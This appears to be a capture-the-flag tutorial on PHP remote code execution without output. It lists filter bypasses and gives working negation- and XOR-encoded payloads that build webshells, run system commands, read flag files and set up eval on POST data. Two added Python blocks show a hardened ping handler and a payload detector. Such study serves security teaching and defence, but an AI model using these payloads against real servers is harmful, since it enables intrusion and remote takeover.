RCE (no echo)
2022-07-24 20:44:00 【Occasionally dodge dark clouds 334】
I. Definition of RCE
RCE is short for remote command/code execution.
It is divided into remote command execution (e.g. via ping) and remote code execution (e.g. via eval).
Cause of the vulnerability: the input is not processed at all at the entry point.
The web management interfaces of common routers, firewalls, intrusion detection systems and similar devices
generally provide users with a ping operation: the user enters a target IP on the web page, and after submission the backend runs a ping test against that IP and returns the result. This is in fact an interface that lets an attacker inject operating system commands or code straight into the backend server and thereby take control of it. That is the RCE vulnerability.
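The ping interface described above is the textbook case of "no input processing at the entry point". The Python below is an added example (not code from the original post): it shows the vulnerable string-splicing pattern next to a hardened handler that only accepts a literal IP address and never lets a shell see the value. Function names and the use of the standard ipaddress/subprocess modules are my own choices.

```python
import ipaddress
import subprocess

# Vulnerable pattern from the page: the submitted "IP" is spliced into a shell
# command string, so any shell metacharacters it contains are obeyed by the shell.
def vulnerable_ping_command(target: str) -> str:
    return "ping -c 1 " + target   # shown only for contrast; never hand this to a shell

# Hardened form (added example): the value must parse as an IP address, and it is
# passed to ping as its own argv element, so no shell ever interprets it.
def build_ping_argv(target: str) -> list[str]:
    cleaned = target.strip()
    try:
        addr = ipaddress.ip_address(cleaned)   # raises on anything that is not a literal IP
    except ValueError as exc:
        raise ValueError(f"rejected ping target {cleaned!r}") from exc
    return ["ping", "-c", "1", str(addr)]

def is_safe_target(target: str) -> bool:
    """True only if build_ping_argv() accepts the value; handy for a request handler."""
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False

def run_ping(target: str, timeout: float = 5.0) -> str:
    """Validate, then run ping with shell=False (the default) and return its output."""
    argv = build_ping_argv(target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr

if __name__ == "__main__":
    # Constructed inputs: a clean address and one carrying a spliced-in extra command.
    for candidate in ["10.0.0.1", "10.0.0.1;ls", "example.com"]:
        print(f"{candidate!r:>16} -> safe={is_safe_target(candidate)}")
```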
II. Functions that can be used to achieve RCE directly
1. eval()
2. assert(), the assertion function
PHP 5
assert(mixed $assertion, string $description = ?): bool
PHP 7
assert(mixed $assertion, Throwable $exception = ?): bool
assert() checks the given assertion and takes appropriate action when the result is false.
In addition, if assertion is a string, assert() treats it as PHP code and executes it.
3. system()
Executes a given command, such as ls, cat, whoami or ifconfig.
4. passthru()
Basically the same usage as system(); consider it when system is filtered.
5. exec()
Because exec() has no echo, its output can be saved to a file or displayed with print_r().
Usage: echo exec("ls",$file);
exec(print_r(system("ls"))); // system and print_r can be replaced by functions with similar behaviour
6. shell_exec()
shell_exec() has the same effect as backticks ``, but no echo; it needs echo or another output function to display the result.
III. Command execution bypasses
1. Keywords such as cat and flag are filtered
more: displays file content page by page
less: similar to more
head: shows the first few lines
tac: displays starting from the last line; tac is cat displayed in reverse
tail: shows the last few lines
nl: displays the file and also prints line numbers
od: reads file content in binary mode
vi: an editor, can view the file
vim: an editor, can view the file
sort: can view the file
uniq: can view the file
file -f: reports the content in its error message
sh /flag 2>%261 // reports the file content in the error message (%26 is the URL encoding of &)
2. Spaces are filtered
%09 (tab, passed via URL)
%20 (space)
${IFS}
$IFS$9
<> (cat<>/flag)
< (cat</flag)
$IFS
{cat,flag} // curly braces
3. Separators | & ; are filtered
See also the RCE summary on C1yas0's CSDN blog, which is very detailed.
The key point here is bypassing without echo.
1. The first is XOR
aa='phpinfo()' # change to the desired string
for i in aa:
    print(hex(ord(i) ^ 0xff), end=' ')
Example: print_r = (%8f%8d%96%91%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff)
2. Negation bypass
<?php
echo urlencode(~'phpinfo');
payload: ?code=(~%8F%97%8F%96%91%99%90)();
For example, this challenge:
<?php
error_reporting(0);
if(isset($_GET['code'])){
$code=$_GET['code'];
if(strlen($code)>40){
die("This is too Long.");
}
if(preg_match("/[A-Za-z0-9]+/",$code)){
die("NO.");
}
@eval($code);
}
else{
highlight_file(__FILE__);
}
?>
Filters out all numbers and letters.
Here we cannot use eval directly, because eval is not a PHP function, so we cannot call it via a variable function.
Here we construct it with assert, but because of the PHP version we cannot directly construct <?php assert($_POST['a']);?>, we need to call eval,
concatenated as assert(eval($_POST[test]))
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[x]))';
$d=urlencode(~$c);
echo $d;
?>
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%87%A2%D6%D6);
Then connect with AntSword (蚁剑) to operate.
Webshell with no echo
<?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){
die("giaogiaogiao!!!");
}
else {
eval($cmd);
}
highlight_file(__FILE__);
?>
Also filters out alphanumerics, but using the method from the question above reports an error, which shows that there is additional filtering in the backend.
For no-alphanumeric webshells, PHP 5 and PHP 7 behave differently.
(1) In PHP 5, assert() is a function, so we can use the form $_=assert;$_() to execute code dynamically. But in PHP 7, assert() became a language construct like eval(), and the calling method above is no longer supported. (It seems PHP 7.0.12 can still call it, though.)
(2) PHP 5 does not support calling a method as ($a)(), but PHP 7 does, so writing ('phpinfo')(); is supported there.
Entering the page, we find that letters and numbers are filtered, so we need a no-alphanumeric webshell. There are many ways to construct one: negation, XOR, self-increment, closing backtick construction and so on. By converting non-alphanumeric characters we can eventually construct any character in a-z0-9, and then use the PHP feature that allows dynamic function execution by splicing together a function name, achieving dynamic execution.
1. Code negation bypass
URL-encode ~'_GET' to get the negated encoding; the positive form is then constructed as negation + negation = original.
In the figure, %A0%B8%BA%AB is the negation of _GET and %93%8C is the URL-encoded negation of ls; the payload in the figure executes the command system(ls).
?cmd=${~%A0%B8%BA%AB}{%ff}(~%93%8C);&%ff=system

<?php echo urlencode(~'cat flag.txt');
%9C%9E%8B%DF%99%93%9E%98%D1%8B%87%8B
Finally, replace ls with the negated URL encoding of cat flag.txt to grab the content of flag.txt.
Method 2:
Use the closing method
Use ?> to close the original <?, then use new <? content ?> to rewrite it, and use backticks ` together with the URL-encoded negation form to execute the command.
Because PHP files always start with <?, we close it in advance. PHP short tags: <?=?> is equivalent to <? echo ?>.
?><?=`{${~%A0%B8%BA%AB}{%ff}}`;&%ff=ls
Backticks `` mean command execution, shorthand for shell_exec.
Get flag.txt:
?><?=`{${~%A0%B8%BA%AB}{%ff}}`;&%ff=cat flag.txt   (flag.txt is in the current directory)
Method 3:
Construct with XOR
<?php
var_dump("`{{{"^"?<>/"); //_GET
?>
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
?cmd=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=system&__=ls
Getting the flag after that needs no further explanation.
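The XOR and negation encodings used in the methods above are trivially reversible, which is exactly what a detection rule should exploit. The Python below is an added example (not from the original post or any blog it cites): it decodes the ~ and ^ constructs found in a query string and reports the function names they hide. The SUSPICIOUS list and the function names are my own; the sample queries are the payloads shown on this page plus one benign control line.

```python
import re
from urllib.parse import unquote_to_bytes

# Names whose appearance after decoding warrants an alert; all occur in this page's payloads.
SUSPICIOUS = (b"system", b"assert", b"eval", b"exec", b"passthru",
              b"shell_exec", b"phpinfo", b"print_r", b"_GET", b"_POST")

# ~ followed by a run of high bytes: the bitwise negation of printable ASCII.
NEG_RE = re.compile(rb"~([\x80-\xff]+)")
# "abc"^"def": two quoted strings XORed byte by byte (the $_GET construction above).
QUOTED_XOR_RE = re.compile(rb'"([^"]*)"\^"([^"]*)"')
# (high bytes)^(high bytes): the parenthesised form used on this page for print_r.
PAREN_XOR_RE = re.compile(rb"\(([\x80-\xff]+)\)\^\(([\x80-\xff]+)\)")

def decode_negation(blob: bytes) -> bytes:
    """Undo PHP's ~ operator: each byte b becomes (~b) & 0xff."""
    return bytes((~b) & 0xff for b in blob)

def decode_xor(a: bytes, b: bytes) -> bytes:
    """Undo the string ^ operator; PHP XORs byte-wise up to the shorter length."""
    return bytes(x ^ y for x, y in zip(a, b))

def recover_identifiers(raw_query: str) -> list[bytes]:
    """Return every plaintext string hidden by ~ or ^ in a URL query string, in order."""
    data = unquote_to_bytes(raw_query)          # resolves %XX; raw quotes/backticks pass through
    found = [decode_negation(m.group(1)) for m in NEG_RE.finditer(data)]
    found += [decode_xor(a, b) for a, b in QUOTED_XOR_RE.findall(data)]
    found += [decode_xor(a, b) for a, b in PAREN_XOR_RE.findall(data)]
    return found

def flag_request(raw_query: str) -> set[bytes]:
    """Suspicious names that appear only after decoding; an empty set means nothing was hidden."""
    return {name for ident in recover_identifiers(raw_query)
            for name in SUSPICIOUS if name in ident}

# Sample request query strings: the payloads from this page plus a benign control.
SAMPLE_QUERIES = [
    "cmd=${~%A0%B8%BA%AB}{%ff}(~%93%8C);&%ff=system",
    "code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%87%A2%D6%D6);",
    "cmd=$_=\"`{{{\"^\"?<>/\";${$_}[_](${$_}[__]);&_=system&__=ls",
    "x=(%8f%8d%96%91%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff)",
    "id=42&name=alice",                          # benign control: nothing to decode
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q[:40].ljust(42), recover_identifiers(q), flag_request(q))
```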
PHP short tags
Our most common PHP tag is <?php ?>, but PHP also has two short tags, namely <? ?> and <?= ?>. When the keyword "php" is filtered we can no longer use <?php ?>, but we can bypass the filter with the other two short tags, and the code inside a short tag does not need a trailing semicolon.
<? ?> is a replacement for <?php ?>, and <?= ?> is equivalent to <?php echo ... ?>. For example:
<?='Hello World'?> // outputs "Hello World"
Recommended reading: "Summary of no-alphanumeric webshells", Tencent Cloud developer community, very clear.